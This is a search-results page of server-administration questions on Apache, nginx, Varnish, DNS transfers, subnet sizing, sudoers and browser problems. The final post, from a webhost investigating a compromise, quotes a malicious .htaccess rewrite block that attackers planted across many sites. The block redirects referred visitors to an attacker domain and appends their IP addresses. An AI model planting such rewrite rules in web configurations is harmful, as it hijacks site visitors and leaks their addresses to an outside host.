Search Results

Search found 7625 results on 305 pages for 'scraper sites'.


  • Apache Server with memcache, varnish and php slow request times

    - by coolestdude1
    My issue is that these servers are taking rather long to serve requests: about 2 seconds on average just to serve files. When we had just one server doing everything, it was noticeably faster, even with the same web app (Drupal 6 and Drupal 7). I want to get this number down to a reasonable level, so I need some help getting to the bottom of why the request times are so slow. The slowness can cause the web app to hang on POST or PUT and generally leads to a bad user experience on my sites. PS: I am more of a server newbie, so this has confounded me for quite some time.

    The domains: collabornation.net and nptrainingworks.com (they run off the same two web servers using vhost configs).

    The gear: two Rackspace 4 GB servers running CentOS 6.2 Final. They have a mounted file system (GlusterFS) that is used to keep files the same on both machines, and they sit behind a Rackspace load balancer running round robin. MySQL is accessed using php-pdo and php-mysql; as such, MySQL runs on another instance, which also runs memcache and hosts phpMyAdmin.

    Versions: Apache 2.2.15-15.el6.centos.1 (httpd.x86_64), Varnish 3.0.2-1.el5 (varnish.x86_64), PHP 5.3.14-1.el6.remi (php.x86_64).

    Configs linked below: Apache conf, vhost conf, Varnish backends, Varnish defaults, Varnish ACL, PHP INI. Again, need some help, much appreciated!
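
    A useful first step is to measure where the time goes on a single request. The following is a minimal diagnostic sketch (using one of the domains mentioned above); curl's -w timing variables separate DNS, connect, and server processing time, which helps tell a slow backend apart from slow network setup:

        # time the phases of one request; repeat against each backend directly
        # (bypassing the load balancer) to isolate the slow hop
        curl -s -o /dev/null \
             -w 'dns=%{time_namelookup} connect=%{time_connect} ttfb=%{time_starttransfer} total=%{time_total}\n' \
             http://collabornation.net/

    Running this against Varnish, against Apache's port directly, and through the load balancer should narrow down which layer contributes the two seconds.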

  • Transferring domain from one registrar to another

    - by Macha
    I have a domain from my old web host, which was free with my hosting account. After a few years, I am moving to a VPS. Most of my other domains were registered with Namecheap, so moving them was just a matter of changing a few DNS records. However, given that my old host does not provide me with a DNS control panel, and I don't want to be paying a full hosting bill for just domains, I'm now looking into transferring this one. My old host says there will be a charge of $15 to them. Namecheap's page seems to imply you don't need the current registrar to do anything, but it also seems to be based on sending an email to the address listed in whois. Of course, my old host has WhoisGuard on the domain, so the only email on it is [email protected] (and not a unique [email protected], just [email protected]), which doesn't go to me. Again, there doesn't seem to be an option to disable this. So, is it a case of paying my old host's fee and paying again for the domain from Namecheap, or is there some other way to transfer my domain? (I'm not really sure which of the trilogy sites this is best for.)

  • How to access XAMPP virtual hosts from iPad on local network?

    - by martin's
    Using XAMPP on one machine. Multiple virtual hosts defined, one per project, named in the format sitename.local. For example: apple.local, microsoft.local, client-site.local, our-own-internal-site.local. All works perfectly from that one machine. I now want other systems within the network to access the various sites. The main reason for wanting this is to be able to test site functionality and layout from mobile devices without having to upload partial work to public servers. I can access the main XAMPP default site by simply entering the IP address of the XAMPP machine in, say, Safari on an iPad. However, there is no way to reach the .local sites that I can see. Would this entail setting up a DNS server within the network? We have a mixture of Windows and Mac machines, no Linux. The XAMPP machine is Vista 64. I don't want real external internet access to be affected in any way, just ".local" pointed to the XAMPP machine, if that makes sense.
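
    One common approach (a sketch, not something from the question itself) is to run a small DNS forwarder such as dnsmasq on any always-on machine, answer for the project names there, and point the router's DHCP at it so the iPad picks it up automatically. Assuming the XAMPP machine sits at 192.168.1.10 (a hypothetical address):

        # /etc/dnsmasq.conf -- resolve every *.local name to the XAMPP box,
        # forward everything else to the usual upstream resolvers
        address=/local/192.168.1.10

    One caveat worth noting: Apple devices reserve .local for Bonjour/mDNS, so a suffix like .test or .dev.lan tends to behave more predictably on iPads than .local does.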

  • Firefox Does NOT get local site cookie

    - by Campo
    This is a weird one. We have a production server (Server 2008) and two staging servers (Server 2008 and Server 2003), and I have sites on all of them. They all use cookies. On the production server, when browsing to our site www.supernovainteractive.com, there is a cookie that detects when you visited the site, and it will not replay the logo animation (top left-hand side) when you click through to another page. This works in all browsers on the production server. I'm not sure what's going on, but for some reason cookies are not working on one site on the 2008 staging server only. This happens when browsing with Firefox (3.6.3); they work fine in all other browsers (IE, Chrome, Safari, Opera). In addition, the 2003 staging server works fine. You can test on the Supernova Interactive site by watching the logo in the top left corner. It uses a cookie to detect if you've already seen the animation. Once you've seen it once, it doesn't animate again until tomorrow. Currently, it's animating every time. I have opened an outside-facing port so others can see the issue: http://exchange.supernova.com:10009. Any ideas on this one? Firewalls are off on the server. Notice you do not get a cookie from exchange.supernova.com.
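
    When a cookie works in every browser except one, it helps to look at the raw Set-Cookie header rather than the browser. A quick check against the test URL from the question (a diagnostic sketch; adjust the path as needed):

        # dump response headers and isolate the cookie line
        curl -s -D - -o /dev/null http://exchange.supernova.com:10009/ | grep -i set-cookie

    Browsers differ in how much they tolerate malformed Domain or Expires attributes, so a Domain value that doesn't match the host, or an odd date format, would show up here even when other browsers silently accept it.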

  • Customer site is out of IP addresses, they want to go from /24 to /12 netmask... Bad idea?

    - by ewwhite
    One of my client sites called to ask me to change the subnet masks of the Linux servers I manage there while they re-IP/change the netmask of their network to a 10.0.0.x scheme. "Can you change the server netmasks from 255.255.255.0 to 255.240.0.0?" You mean 255.255.240.0? "No, 255.240.0.0." Are you sure you need that many IP addresses? "Yeah, we never want to run out of IP addresses." A quick check against the Subnet Cheat Sheet shows: a 255.255.255.0 netmask, a /24, provides 256 addresses, and it's easy to see how an organization could exhaust that. A 255.240.0.0 netmask, a /12, provides 1,048,576 addresses. This is a small site with fewer than 200 users; I doubt they'd ever allocate more than 400 IP addresses. I suggested something that provides fewer hosts, like a /22 or /21 (1024 and 2048 addresses, respectively), but was unable to give a specific reason against using the /12. Is there anything this customer should be concerned about? Are there any specific reasons they shouldn't use such an incredibly large mask in their environment?
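
    For concreteness, the arithmetic behind those numbers: a /N mask leaves 32 - N host bits, so the block holds 2^(32-N) addresses (two of which are reserved for the network and broadcast addresses in a flat subnet). A worked comparison:

        /24  255.255.255.0   2^8  =       256 addresses   e.g. 10.0.0.0 - 10.0.0.255
        /22  255.255.252.0   2^10 =     1,024 addresses   e.g. 10.0.0.0 - 10.0.3.255
        /12  255.240.0.0     2^20 = 1,048,576 addresses   e.g. 10.0.0.0 - 10.15.255.255

    The practical argument against the /12 is less about running out of numbers and more about putting a million addresses in one broadcast domain: every ARP request and broadcast frame reaches every host, no room is left to subnet the 10.x space for VPNs or other sites later, and a /22 already gives this site several times more addresses than it is ever likely to use.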

  • How can I make the Firefox Password Manager more intelligent?

    - by Philip
    I have two major gripes about the FF password manager. First, if I restore a session with multiple tabs containing sites with saved passwords, the master-password prompt pops up once for each of them, even if I correctly enter the password the first time. Second, sometimes I want Firefox not to use my saved passwords at all (e.g. because I want to let someone else use it without getting access to my accounts), but hitting cancel results in erratic behavior: sometimes the box just pops up again and again, and sometimes it stops and behaves as I wish (continuing to browse without my passwords) until it encounters another site that wants my password. Thus even when hitting cancel does leave me free to browse passwordless, it doesn't get Firefox to leave me alone for the whole session. So: do you know of any tweak or add-on that could (1) make Firefox smart enough to ask for my master password once and then leave me alone, and/or (2) add an option (checkbox, toggle button, etc.) to browse "for now" (until I toggle the option) or even "for this session" (until I restart) without using any of my saved passwords? I'm running Firefox 3.5.6 on Mac OS X 10.5; thanks.

  • Firefox: Clear History Is SUPER EFFECTIVE?

    - by acidzombie24
    I'm seeing a performance problem on certain sites (like Gmail) that clearing the history should not affect. Is this a website problem or a Firefox problem, and what can I do to fix it without clearing my history? Also, as a web developer, I am interested in how to make this happen (or not happen). I'm using Firefox 8, and I confirmed the problem by copying my profile to Firefox 11 (portable). To reproduce: go to gmail.com and sign in, with your task manager open. Once you click sign-in or hit enter, Gmail will bring up your emails. Keep your eye on the CPU usage. I checked, and right now on this machine it's using all my CPU for 22 seconds! Yes, 22 seconds. Once I cleared my "browser & download history", it's under 6 seconds. I have no idea why or how the size of the history and the CPU usage when loading Gmail are correlated. I have Firefox set up so it never clears the history, but 22 seconds is a disaster. Can someone explain why this is happening, or suggest a fix that isn't clearing my history? I tried visiting a few websites and only Gmail eats up that much CPU; most websites take under 5 seconds of max CPU. So maybe this is a Gmail problem? Or a Firefox problem that Gmail happens to hit? I still don't understand why it happens. Edit: I forgot to mention places.sqlite is 90 MB. I don't think that matters; I have another SQLite file of 400 MB, which is pretty much 2 large tables, and it has no performance issues.
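
    Since the symptom tracks the size of the history database, one commonly suggested mitigation (a sketch; back up the profile first, and run it with Firefox closed) is to compact and reindex places.sqlite rather than delete it:

        # from the Firefox profile directory, with Firefox not running
        sqlite3 places.sqlite 'VACUUM;'
        sqlite3 places.sqlite 'REINDEX;'

    A fragmented places.sqlite can make anything that queries history do far more I/O than the file size alone would suggest, which fits the "clearing history fixes it" observation without explaining why Gmail in particular triggers the heavy queries.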

  • Sharepoint: authenticating users via forms authentication

    - by sbee
    My problem is the following (SharePoint newbie): I want to change the default zone from a Windows-authenticated zone to a forms-authenticated zone, thereby forcing the site collection administrator to log in via forms authentication and not Windows; the SharePoint users will also be accessing the site internally. My goal is to effectively replace Windows authentication with forms authentication, as my company does not have Active Directory installed. So far I have created an ASP.NET application that adds the users to the database; the database was created via the .NET Framework ASP.NET SQL tool (aspnet_regsql). However, when I change the default zone to the AspNetSqlMembershipProvider (forms) and attempt to add my site collection administrator via Central Administration, I get the error "No exact match found", as shown on the screenshot. My inkling is that somehow the people picker is failing to read the users from the database, but research on correcting that has so far proved fruitless. I have made all the relevant changes in the config files of these sites (Central Administration site, my test site, and the Add Users site): membership provider, connection string, and people picker. I left out the role provider for now, as it is optional. Help on this would be highly appreciated.
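
    "No exact match found" from the people picker usually means the picker's search wildcards were never told about the SQL membership provider. A hedged sketch of the web.config section involved (the key must match the provider name registered for the zone; treat this as an illustration rather than a verified fix):

        <PeoplePickerWildcards>
            <clear />
            <add key="AspNetSqlMembershipProvider" value="%" />
        </PeoplePickerWildcards>

    This entry typically has to be present in the web.config of the Central Administration web application as well as the content web application, since Central Administration performs the people-picker lookup when you assign a site collection administrator.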

  • Serving static content with Apache web server and Tomcat

    - by Hunter
    I've configured Apache web server and Tomcat like this. I created a new file in apache2/sites-available named "myDomain" with this content:

        <VirtualHost *:80>
            ServerAdmin [email protected]
            ServerName myDomain.com
            ServerAlias www.myDomain.com
            ProxyPass / ajp://localhost:8009
            <Proxy *>
                AllowOverride AuthConfig
                Order allow,deny
                Allow from all
                Options -Indexes
            </Proxy>
        </VirtualHost>

    Then I enabled mod_proxy and the myDomain site:

        a2enmod proxy_ajp
        a2ensite myDomain

    And I edited Tomcat's server.xml (inside the Engine tag):

        <Host name="myDomain.com" appBase="webapps/myApp">
            <Context path="" docBase="."/>
        </Host>
        <Host name="www.myDomain.com" appBase="webapps/myApp">
            <Context path="" docBase="."/>
        </Host>

    This works great. But I don't want to put static files (HTML, images, videos, etc.) into {tomcat home}/webapps/myApp's subfolders; instead I'd like to put them in subdirectories of the Apache web server's root WWW directory, and I'd like Apache to serve these files alone. How could I do this, so that all incoming requests are forwarded to Tomcat except those that ask for a static file?
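
    One way to get that split (a sketch under the assumption that static content lives in /var/www/myDomain/static, a hypothetical path; mod_proxy's "!" exclusion keeps matching paths away from the proxy) is:

        <VirtualHost *:80>
            ServerName myDomain.com
            ServerAlias www.myDomain.com
            DocumentRoot /var/www/myDomain

            # anything under /static is served by Apache directly
            ProxyPass /static !
            # everything else goes to Tomcat over AJP
            ProxyPass / ajp://localhost:8009
        </VirtualHost>

    Exclusions must appear before the catch-all ProxyPass line, since mod_proxy applies the first matching rule. A dedicated /static prefix keeps the rules easier to reason about than matching on file extensions.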

  • Apache2 doesn't serve PHP-scripts correctly [closed]

    - by cmbrnt
    I've run into a problem with my Apache 2.2.16 configuration, running on Debian Squeeze. The problem is that it has stopped serving PHP5 scripts completely. When I try to access the sites with Google Chrome, it instead downloads a file called "download", which contains the contents of the script. This is of course not a good thing. It does serve common HTML files perfectly. I've been at this for quite a while now, and after all the googling and troubleshooting, I thought it would be a good time to ask you guys. Here's what I've got: the php5 and libapache2-mod-php5 packages are installed; /etc/apache2/mods-available contains both php5.load and php5.conf, and these are symlinked from the mods-enabled directory; the /etc/php5/ directory is left untouched since the installation. Here's the contents of /etc/apache2/mods-available/php5.load:

        LoadModule php5_module /usr/lib/apache2/modules/libphp5.so

    And /etc/apache2/mods-available/php5.conf:

        <IfModule mod_php5.c>
            <FilesMatch "\.ph(p3?|tml)$">
                SetHandler application/x-httpd-php
            </FilesMatch>
            <FilesMatch "\.phps$">
                SetHandler application/x-httpd-php-source
            </FilesMatch>
            <IfModule mod_userdir.c>
                <Directory /home/*/public_html>
                    php_admin_value engine Off
                </Directory>
            </IfModule>
        </IfModule>

    What am I missing? This is a server with modified virtual hosts and the like, so I might have changed some settings that cause this problem, but simply purging and reinstalling is not an option so far, since the configuration is quite extensive. Any help would be great. Thanks.
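
    With the module files in place, the usual suspects are the symlinks not actually being active or a stray handler override in a vhost. A few checks worth running (standard Debian commands; the grep target is illustrative):

        # confirm the module is really loaded
        apache2ctl -M | grep php5

        # re-enable cleanly and restart
        a2enmod php5
        /etc/init.d/apache2 restart

        # look for anything in the vhosts that hijacks .php handling
        grep -R "php" /etc/apache2/sites-enabled/

    A browser that downloads the raw script means Apache never handed the request to mod_php, so the answer is almost always in which configuration wins for that vhost rather than in /etc/php5.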

  • 404 with serving static files in a custom nginx configuration

    - by code90
    In my nginx configuration, I have the following:

        location /admin/ {
            alias /usr/share/php/wtlib_4/apps/admin/;
            location ~* .*\.php$ {
                try_files $uri $uri/ @php_admin;
            }
            location ~* \.(js|css|png|jpg|jpeg|gif|ico|pdf|zip|rar|air)$ {
                expires 7d;
                access_log off;
            }
        }
        location ~ ^/admin/modules/([^/]+)(.*\.(html|js|json|css|png|jpg|jpeg|gif|ico|pdf|zip|rar|air))$ {
            alias /usr/share/php/wtlib_4/modules/$1/admin/$2;
        }
        location ~ ^/admin/modules/([^/]+)(.*)$ {
            try_files $uri @php_admin_modules;
        }
        location @php_admin {
            if ($fastcgi_script_name ~ /admin(/.*\.php)$) {
                set $valid_fastcgi_script_name $1;
            }
            fastcgi_pass $byr_pass;
            fastcgi_index index.php;
            fastcgi_param SCRIPT_FILENAME /usr/share/php/wtlib_4/apps/admin$valid_fastcgi_script_name;
            fastcgi_param REDIRECT_STATUS 200;
            include /etc/nginx/fastcgi_params;
        }
        location @php_admin_modules {
            if ($fastcgi_script_name ~ /admin/modules/([^/]+)(.*)$) {
                set $byr_module $1;
                set $byr_rest $2;
            }
            fastcgi_pass $byr_pass;
            fastcgi_index index.php;
            fastcgi_param SCRIPT_FILENAME /usr/share/php/wtlib_4/modules/$byr_module/admin$byr_rest;
            fastcgi_param REDIRECT_STATUS 200;
            include /etc/nginx/fastcgi_params;
        }

    The following requested URL ends up with a 404: http://www.{domainname}.com/admin/modules/cms/styles/cms.css. The error log shows:

        [error] 19551#0: *28 open() "/usr/share/php/wtlib_4/apps/admin/modules/cms/styles/cms.css" failed (2: No such file or directory), client: xxx.xxx.xxx.xxx, server: {domainname}.com, request: "GET /admin/modules/cms/styles/cms.css HTTP/1.1", host: "www.{domainname}.com"

    The following URLs work fine: http://www.{domainname}.com/admin/modules/store/?a=manage and http://www.{domainname}.com/admin/modules/cms/?a=cms.load. Can anyone see what the problem could be? Thanks. PS. I am trying to migrate existing sites from Apache to nginx.
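
    The error log shows the request being resolved under apps/admin/, which suggests it matched the generic static-file regex nested inside location /admin/ and inherited that block's alias, so the outer ^/admin/modules/ regex never got a chance. One possible fix (a sketch, untested against this exact tree) is to nest a more specific modules location ahead of the generic one, so its alias wins:

        location /admin/ {
            alias /usr/share/php/wtlib_4/apps/admin/;

            # module assets resolve under modules/<name>/admin/, not apps/admin/
            location ~ ^/admin/modules/([^/]+)(.*\.(js|css|png|jpg|jpeg|gif|ico|pdf|zip|rar|air))$ {
                alias /usr/share/php/wtlib_4/modules/$1/admin/$2;
                expires 7d;
                access_log off;
            }

            # ... the existing php and static locations follow unchanged ...
        }

    nginx tries the nested regex locations in their order of appearance, so the specific pattern must precede the generic one; the working ?a=... URLs fall through to the PHP handlers either way.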

  • Client cannot access my IIS7 web server

    - by Soccerwiz
    I have a Windows 2008 web server running IIS 7 with about 25 websites. One of those sites is an SaaS application that is accessed constantly throughout the day. However, one particular client keeps getting blocked from my server. They will be using the service, and then all of a sudden they cannot access the program, or any other site on the server. The entire office of 4 users is blocked from accessing anything on the web server. A trace route reveals they get all the way to the server before they are blocked. However, they can access a Linux server that is a different VM with a different IP on the same physical server. Also, when they are blocked from their office, they can still access the site from their mobile phones or the local Starbucks. They can also occasionally reset their router and regain access to the web server, as they are on a dynamic IP address. I checked IIS, and I allow all IPs to access the server. There is nothing in the logs that says anything about a user being banned. I really have no idea what is causing this. Could it be a virus on their end? I have even moved the SaaS to a completely new server in a different location; they were working fine for about a month, and then the problem started occurring again. Are there any hidden blacklists in IIS? Or is it a routing issue on their end?

  • finding files that match a precise size: a multiple of 4096 bytes

    - by doub1ejack
    I have several Drupal sites running on my local machine with WAMP installed (Apache 2.2.17, PHP 5.3.4, and MySQL 5.1.53). Whenever I try to visit the administrative page, the PHP process seems to die. From apache_error.log:

        [Fri Nov 09 10:43:26 2012] [notice] Parent: child process exited with status 255 -- Restarting.
        [Fri Nov 09 10:43:26 2012] [notice] Apache/2.2.17 (Win32) PHP/5.3.4 configured -- resuming normal operations
        [Fri Nov 09 10:43:26 2012] [notice] Server built: Oct 24 2010 13:33:15
        [Fri Nov 09 10:43:26 2012] [notice] Parent: Created child process 9924
        [Fri Nov 09 10:43:26 2012] [notice] Child 9924: Child process is running
        [Fri Nov 09 10:43:26 2012] [notice] Child 9924: Acquired the start mutex.
        [Fri Nov 09 10:43:26 2012] [notice] Child 9924: Starting 64 worker threads.
        [Fri Nov 09 10:43:26 2012] [notice] Child 9924: Starting thread to listen on port 80.

    Some research has led me to a PHP bug report on the "4096 byte bug". I would like to see if I have any files whose size is a multiple of 4096 bytes, but I don't know how to do that. I have Git Bash installed and can use most of the typical Linux tools through that (find, grep, etc.), but I'm not familiar enough with Linux to figure it out on my own. Little help?
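
    Git Bash ships GNU find and awk, so one way to list candidate files (a sketch; run it from the site's document root) is to print each file's size and path and let awk do the modulo test:

        # list non-empty files whose size is an exact multiple of 4096 bytes
        find . -type f -printf '%s %p\n' | awk '$1 > 0 && $1 % 4096 == 0 { print }'

    The $1 > 0 guard skips empty files, which would otherwise match trivially since 0 is a multiple of everything.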

  • Servers - Buying New vs Buying Second-hand

    - by Django Reinhardt
    We're currently in the process of adding additional servers to our website. We have a pretty simple topology planned: a firewall/router server in front of a web application server and a database server. (A simple, and technically incorrect, diagram that I used in a previous question illustrated this.) We're now wondering about the specs of our two new machines (the web app and firewall servers) and whether we can get away with buying a couple of old servers. (Note: both machines will be running Windows Server 2008 R2.) We're not too concerned about our firewall/router server, as we're pretty sure it won't be taxed too heavily, but we are interested in our web app server. I realise that answering this type of question is really difficult without a ton of specifics on users, bandwidth, concurrent sessions, etc., so I just want to focus on the general wisdom of buying old versus new. I had originally specced a new Dell PowerEdge R300 (1U rack) for our company. In short, because we're going to be caching as much data as possible, I focussed on processor speed and memory: a quad-core Intel Xeon X3323 2.5 GHz (2x3 MB cache, 1333 MHz FSB) with 16 GB of DDR2 667 MHz. But when I was looking for a cheap second-hand machine for our firewall/router, I came across several machines that made our engineer ask a very reasonable question: if we stuck a boatload of RAM in this thing, wouldn't it do for the web app server and save us a ton of money in the process? For example, what about a second-hand machine with two dual-core AMD Opteron 2218 2.6 GHz (2 MB cache, 1000 MHz HT) and 16 GB of DDR2 667 MHz? Would it really be comparable with the more expensive (new) server above? Our engineer postulated that the reason companies upgrade their servers to newer processors is often that they want to reduce their power costs, and that a 2.6 GHz processor is still a 2.6 GHz processor, no matter when it was made. Benchmarks on various sites don't really support this theory, but I was wondering what server admins thought. Thanks for any advice.

  • sudoer scheme to allow useful access to another web developer yet retain future control of a virtual private server

    - by Tchalvak
    Background: I have a virtual private server that I'm looking to host multiple websites on, and I want to provide access to another web developer. I don't care about putting too many constraints on him, though I wouldn't mind isolating the site that he'll be developing from the other sites on the server that I will develop. The problem: retaining control. Mainly what I want is to make sure that I retain control over the server in the future. I want to reserve the ability to create/promote/demote accounts and perform other administrative functions that don't deal with web software. If I make him an admin, he can sudo su - to become root and remove root control from me, for example. I need him not to be able to: take away other admin permissions, change the root password, or control other security/administrative functions. I would like him to still be able to: install software (through apt-get), restart Apache, access MySQL, configure MySQL/Apache, reboot, and edit web-development configuration files in /etc/. Other standard setups would be happily considered; I've never really set up a good sudoers file, so simple example setups would be very useful, even if they're only somewhat similar to the settings I'm hoping for above. Edit: I have not yet finalized permissions, so standard, useful sudo setups are certainly an option; the lists above are more what I'm hoping I can do, and I don't know whether that setup is possible. I'm sure people have solved this type of problem before somehow, though, and I'd like to go with something somewhat tested as opposed to something I've homegrown.
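
    A minimal sketch of a sudoers fragment along those lines (the username "webdev" and the command paths are assumptions; edit with visudo, and note the caveat below):

        # /etc/sudoers.d/webdev -- sketch only
        Cmnd_Alias WEBDEV = /usr/bin/apt-get, \
                            /usr/sbin/service apache2 *, \
                            /usr/sbin/service mysql *, \
                            /sbin/reboot
        webdev ALL = (root) WEBDEV

    The caveat: unrestricted apt-get (and write access to /etc/) is effectively root, since he could install or reconfigure a package that runs arbitrary code as root. If retaining control really matters, the common compromise is to grant only the narrow service-restart commands via sudo and handle package installs yourself on request.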

  • Apache RewriteEngine, redirect sub-directory to another script

    - by Niklas R
    I've been trying to achieve this for about 1.5 hours now. I want the following transformations when requesting sites on my website:

        homepage.com/                    =>  index.php
        homepage.com/archive             =>  index.php?archive
        homepage.com/archive/site-01     =>  index.php?archive/site-01
        homepage.com/files/css/main.css  =>  requestfile.php?css/main.css

    The first three transformations can be done using the following:

        RewriteEngine on
        RewriteRule ^/?$ index.php
        RewriteRule ^/?(.*)$ index.php?$1

    However, I'm stuck at the point where all requests to the files subdirectory should be redirected to requestfile.php. This is one of the tries I've made:

        RewriteEngine on
        RewriteRule ^/?$ index.php
        RewriteRule ^/?files/(.+)$ requestfile.php?$1
        RewriteRule ^/?(.*)$ index.php?$1

    But that does not work. I've also tried to put [L] after the third line, but that didn't help: as I'm using this configuration in .htaccess, sub-requests will transform the URL again, and so on. I fiddled with the RewriteCond directive but couldn't get it to work. What does the configuration need to look like to achieve what I want?
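
    In a per-directory (.htaccess) context the rewritten URL is fed back through the rule set, so the trick is to stop rewriting once the request already points at a real file such as requestfile.php or index.php. A sketch of that guard (QSA preserves any existing query string; this assumes the .htaccess sits in the document root):

        RewriteEngine on
        # hand everything under files/ to requestfile.php first
        RewriteRule ^files/(.+)$ requestfile.php?$1 [L,QSA]
        # any other existing file (requestfile.php, index.php, ...) passes through
        RewriteCond %{REQUEST_FILENAME} -f
        RewriteRule ^ - [L]
        # everything else becomes an index.php query
        RewriteRule ^(.*)$ index.php?$1 [L,QSA]

    On the internal sub-request, requestfile.php and index.php hit the -f pass-through rule and stop, which breaks the rewrite loop; the empty root request falls through to the last rule and becomes index.php, matching the first transformation in the list above.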

  • How to tell nginx to honor backend's cache?

    - by ChocoDeveloper
    I'm using php-fpm with nginx as the HTTP server (I don't know much about reverse proxies, I just installed it and didn't touch anything), without Apache or Varnish. I need nginx to understand and honor the HTTP headers I send. I tried with this config (taken from the docs), but it didn't work. /etc/nginx/nginx.conf:

        fastcgi_cache_path /var/lib/nginx/cache levels=1:2 keys_zone=website:10m inactive=10m;
        fastcgi_cache_key "$scheme$request_method$host$request_uri";

    /etc/nginx/sites-available/website:

        server {
            fastcgi_cache website;
            #fastcgi_cache_valid 200 302 1h;
            #fastcgi_cache_valid 301 1d;
            #fastcgi_cache_valid any 1m;
            #fastcgi_cache_min_uses 1;
            #fastcgi_cache_use_stale error timeout invalid_header http_503;
            add_header X-Cache $upstream_cache_status;
        }

    I always get "MISS" and the cache dir is empty. If I uncomment the other directives, I get a HIT, but I don't want those "dumb" settings: I need to control caching from my backend. For example, if my backend says "public, s-maxage=10", the cache should be considered stale after 10 seconds; instead, nginx will store it for 1 hour because of these directives. I was thinking about trying proxy_cache instead, but I'm not sure what the difference is. The docs for both the fastcgi and proxy modules say this: "The cache honors backend's Cache-Control, Expires, and etc. since version 0.7.48, Cache-Control: private and no-store only since 0.7.66, though. Vary handling is not implemented." nginx version: nginx/1.1.19. Any thoughts? PS: I also have the reverse proxy that is offered by Symfony2 (which I turn off to use nginx's). The headers are interpreted correctly by it, so I think I'm doing it right.
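
    A quick way to see what the backend is actually sending, and what nginx decides, is to watch the response headers from the outside (a diagnostic sketch; substitute the real host for the placeholder):

        # show the cache verdict alongside the backend's caching headers
        curl -s -D - -o /dev/null http://www.example.com/ | grep -iE 'x-cache|cache-control|expires|set-cookie'

    Two things commonly pin the status at MISS even when Cache-Control looks right: a Set-Cookie header on the response (nginx refuses to cache those by default), and session-starting PHP code that emits no-cache headers before your own. Checking the raw headers distinguishes "nginx ignored my headers" from "PHP never sent the headers I thought it did".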

  • mod_rewrite redirect subdomain to folder

    - by kitensei
    I have a WordPress blog at the URL http://www.orpheecole.com. I would like to set up 3 subdomains (cycle1, cycle2, cycle3), each being redirected to its own folder (1 subdomain = 1 WP blog, no multisite enabled). The file tree looks like this:

        /var/www/orpheecole.com/
        /var/www/cycle1.orpheecole.com/
        /var/www/cycle2.orpheecole.com/
        /var/www/cycle3.orpheecole.com/

    The following .htaccess tries to redirect to /var/www/orpheecole.com/cycleX instead of each subdomain's own directory, but if possible I'd rather redirect every subdomain to its own www folder. My sites-enabled file for the main site is:

        # blog orpheecole
        <VirtualHost *:80>
            ServerAdmin [email protected]
            ServerName orpheecole.com
            ServerAlias *.orpheecole.com
            DocumentRoot /var/www/orpheecole.com/
            <Directory /var/www/orpheecole.com/>
                Options -Indexes FollowSymLinks MultiViews
                Order allow,deny
                allow from all
            </Directory>
            ErrorLog /var/log/apache2/orpheecole.com-error_log
            TransferLog /var/log/apache2/orpheecole.com-access_log
        </VirtualHost>

    And the .htaccess located in /var/www/orpheecole.com/ looks like this:

        <IfModule mod_rewrite.c>
            RewriteEngine on
            RewriteCond %{HTTP_HOST} !^www.* [NC]
            RewriteCond %{HTTP_HOST} ^([^\.]+)\.orpheecole\.com$
            RewriteCond /var/www/orpheecole.com/%1 -d
            RewriteRule ^(.*) www\.orpheecole\.com/%1/$1 [L]
            # BEGIN WordPress
            RewriteBase /
            RewriteRule ^index\.php$ - [L]
            RewriteCond %{REQUEST_FILENAME} !-f
            RewriteCond %{REQUEST_FILENAME} !-d
            RewriteRule . /index.php [L]
            # END WordPress
        </IfModule>

    I tried removing the WordPress directives but nothing changed, and the rewrite module is enabled and working.
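
    Since each subdomain already has its own directory under /var/www, a setup that avoids mod_rewrite entirely may be simpler: give every cycle blog its own VirtualHost whose DocumentRoot points at its folder, and drop *.orpheecole.com from the main vhost's aliases so it no longer swallows those requests. A sketch for one of them (repeat per subdomain, then run a2ensite and reload Apache):

        <VirtualHost *:80>
            ServerName cycle1.orpheecole.com
            DocumentRoot /var/www/cycle1.orpheecole.com/
            <Directory /var/www/cycle1.orpheecole.com/>
                Options -Indexes FollowSymLinks
                Order allow,deny
                allow from all
            </Directory>
        </VirtualHost>

    Apache picks the vhost by ServerName/ServerAlias before any .htaccess runs, so each WordPress install then sees only its own tree and the stock WordPress rewrite block keeps working unchanged.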

  • Dual hard drive Windows 7 system, modified the registry to get programs to install on second drive, now IE doesn't work

    - by paul
    I have a dual-hard-drive Windows 7 system: Windows is installed on an SSD (C:) and I modified the registry to try to force programs to install on the second HDD (another letter). The registry edits are pretty simple, just a few keys in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion to change the drive letter. For the most part the system is very fast and works great, but IE doesn't work anymore. With IE10, it opens a white window for a flash and then closes. I tried installing IE11, which opens a white window for a few seconds, doesn't respond, then crashes. I've tried all the solutions I could find. This includes resetting the IE settings, "uninstalling" and re-installing IE (which is just turning it on and off in "Turn Windows features on or off"), copying the Program Files\Internet Explorer files onto both/either drive, changing the registry keys back to use C:, lots of rebooting, and safe mode. Nothing has worked. I don't see errors in the event viewer, but I might not know what to look for. Any ideas on how to get IE running? I don't need IE for daily browsing; I just need it for cross-browser testing on sites I build, and for the rare occasion a page only works in IE. I don't really want to use a virtual machine, but I would be OK with something standalone like Tredosoft's; I'm just not aware of something like that for current versions of IE.
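
    The keys in question are almost certainly ProgramFilesDir and related values, and IE is widely reported to be fragile when they point away from the system drive. A first step many people try (a sketch; export the key as a backup before merging, then reboot) is restoring the defaults:

        Windows Registry Editor Version 5.00

        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion]
        "ProgramFilesDir"="C:\\Program Files"
        "ProgramFilesDir (x86)"="C:\\Program Files (x86)"

    If IE comes back after this, the cleaner long-term approach is to leave the global Program Files location alone and relocate individual programs at install time, since various Windows components hard-code assumptions about the system drive.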

  • Finding Webserver Vulnerability

    - by Brent
    We operate a webserver farm hosting around 300 websites. Yesterday morning a script placed .htaccess files owned by www-data (the Apache user) in every directory under the document_root of most (but not all) sites. The content of the .htaccess file was this:

        RewriteEngine On
        RewriteCond %{HTTP_REFERER} ^http://
        RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
        RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}

    Googling for that URL (the domain is the MD5 hash of "antivirus") I discovered that this same thing happened all over the internet, and I am looking for somebody who has already dealt with this and determined where the vulnerability is. I have searched most of our logs but haven't found anything conclusive yet. Are there others who experienced the same thing and have gotten further than I have in pinpointing the hole? So far we have determined: the changes were made as www-data, so Apache or its plugins are the likely culprit; all the changes were made within 15 minutes of each other, so it was probably automated; since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site); and if an .htaccess file already existed and was writable by www-data, the script was kind and simply appended the above lines to the end of the file (making it easy to reverse). Any more hints would be appreciated.
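
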